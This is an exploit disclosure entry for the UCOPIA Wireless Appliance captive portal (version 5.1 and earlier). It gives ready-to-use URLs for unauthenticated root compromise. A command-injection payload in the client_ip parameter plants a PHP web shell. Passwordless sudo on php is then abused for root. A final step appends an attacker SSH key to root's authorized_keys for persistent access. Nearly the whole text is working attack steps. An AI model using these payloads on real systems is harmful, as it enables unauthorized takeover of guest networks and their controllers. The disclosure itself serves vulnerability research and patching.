UCOPIA Wireless Appliance < 5.1 (Captive Portal) - Unauthenticated Root Remote Code Execution 2017-10-02 19:05:03

# Exploit Title: Unauthenticated remote root code execution on captive
portal Ucopia <= 5.1
# Date: 02/10/17
# Exploit Author: agix
# Vendor Homepage: http://www.ucopia.com/
# Version: <= 5.1
# Don't know in which version they exactly fixed it.
# When you connect to Ucopia wifi guest, every requests are redirected to controller.access.network

# First create easier to use php backdoor
https://controller.access.network/autoconnect_redirector.php?client_ip=;echo '<?php system($_GET[0]); ?>'>/var/www/html/upload/bd.php;echo t

# As php is in sudoers without password...
https://controller.access.network/upload/bd.php?0=sudo /usr/bin/php -r 'system("id");'

# Just push your ssh key and get nice root access (ssh is open by default even from wifi guest)
https://controller.access.network/upload/bd.php?0=sudo /usr/bin/php -r 'system("echo ssh-rsa AAAA[...] >> /root/.ssh/authorized_keys");'